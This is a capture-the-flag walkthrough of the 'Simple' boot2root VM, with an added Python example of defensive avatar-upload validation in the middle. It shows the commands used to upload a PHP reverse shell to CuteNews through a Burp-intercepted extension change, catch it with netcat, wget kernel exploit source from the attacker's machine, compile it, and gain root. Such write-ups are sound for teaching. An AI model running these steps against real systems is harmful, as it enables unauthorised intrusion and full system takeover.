tags: sectalks

BNE0x03 - Simple

Simple CTF

Simple CTF is a boot2root that focuses on the basics of web-based hacking. /root/flag.txt is your ultimate goal.

Hints

  • Get a user shell by uploading a reverse shell and executing it.
  • A proxy may help you to upload the file you want, rather than the file that the server expects.
  • There are 3 known privesc exploits that work. Some people have had trouble executing one of them unless it was over a reverse shell using a netcat listener.

Discovery

root@kali:~# nmap -n -p- -A 192.168.56.104

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Please Login / CuteNews

Shell

CuteNews 2.0.3 has an arbitrary file upload vulnerability in the avatar function available to a registered user. I first registered an account as rasta:mouse and logged in. Navigate to Personal options and select the Browse button to upload an avatar.

I copied /usr/share/webshells/php/php-reverse-shell.php to /root/rasta.jpg, and changed the IP address for the callback.

Before the upload, open Burp and turn intercept on. When you upload your file, use Burp to change the extension of the filename in the multipart header to .php, so it looks something like this:

name="avatar_file"; filename="rasta.php"
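The check that failed here trusted only the client-supplied filename, so renaming the part in the proxy was enough. The following is an added example (not CuteNews code, and written in Python rather than PHP for illustration) of the server-side validation an avatar upload handler should perform: allowlist the extension, verify the bytes are really an image, and never reuse the client's name for storage. It assumes the multipart filename and raw file bytes have already been extracted; all sample inputs are constructed.

```python
import os
import secrets

# Leading-byte signatures for the only avatar formats the server should accept.
_IMAGE_SIGNATURES = {
    "jpg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
_ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}


def detect_image_type(data: bytes):
    """Return 'jpg', 'png' or 'gif' from the file's magic bytes, or None if it is not an image."""
    for kind, signatures in _IMAGE_SIGNATURES.items():
        if any(data.startswith(sig) for sig in signatures):
            return kind
    return None


def validate_avatar_upload(client_filename: str, data: bytes) -> str:
    """Validate an uploaded avatar and return a server-chosen storage name.

    Raises ValueError when the upload must be rejected.
    """
    # 1. Extension allowlist on the client-supplied name: last suffix only, case-insensitive.
    base = os.path.basename(client_filename.replace("\\", "/"))
    _, sep, ext = base.rpartition(".")
    if not sep or ext.lower() not in _ALLOWED_EXTENSIONS:
        raise ValueError(f"disallowed extension: {ext!r}")
    # 2. The content must be a real image; a PHP file starts with '<?php', not an image header.
    kind = detect_image_type(data)
    if kind is None:
        raise ValueError("content is not a recognised image")
    # 3. Discard the client name entirely: random name plus the extension implied by the content.
    return f"avatar_{secrets.token_hex(8)}.{kind}"


def is_rejected(client_filename: str, data: bytes) -> bool:
    """Helper for checks: True when validate_avatar_upload refuses the upload."""
    try:
        validate_avatar_upload(client_filename, data)
    except ValueError:
        return True
    return False


# Constructed samples: a minimal JPEG header and a harmless PHP snippet standing in for a shell.
SAMPLE_JPEG = b"\xff\xd8\xff\xe0" + b"\x00" * 16
SAMPLE_PHP = b"<?php echo 'constructed sample'; ?>"
```

A second, independent layer is to serve the uploads directory with the PHP handler disabled, so even a file that slips through validation is returned as static content rather than executed.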

Once the file has been uploaded, create a netcat listener and execute your shell.

root@kali:~# nc -lnvp 1234
listening on [any] 1234 ...

root@kali:~# curl http://192.168.56.104/uploads/avatar_rasta_rasta.php

connect to [192.168.56.102] from (UNKNOWN) [192.168.56.104] 52214
Linux simple 3.16.0-30-generic #40~14.04.1-Ubuntu SMP Thu Jan 15 17:45:15 UTC 2015 i686 i686 i686 GNU/Linux
 08:01:39 up 37 min,  0 users,  load average: 0.00, 0.01, 0.03
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ 

Priv esc

This VM is running Ubuntu 14.04.1, which has a kernel vulnerability that will take us straight to root.

$ uname -a
Linux simple 3.16.0-30-generic #40~14.04.1-Ubuntu SMP Thu Jan 15 17:45:15 UTC 2015 i686 i686 i686 GNU/Linux

I used python -m SimpleHTTPServer on my Kali box and used wget to download the exploit source code. gcc is installed on the VM, so we can compile and run without issue.

$ wget http://192.168.56.102:8000/x.c
$ ls -l
-rw-rw-rw- 1 www-data www-data 5123 Apr 16 06:20 x.c
$ gcc x.c -o x
$ ./x
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
sh: 0: can't access tty; job control turned off
# whoami
root

Flag

# cat /root/flag.txt
U wyn teh Interwebs!!1eleven11!!1!
Hack the planet!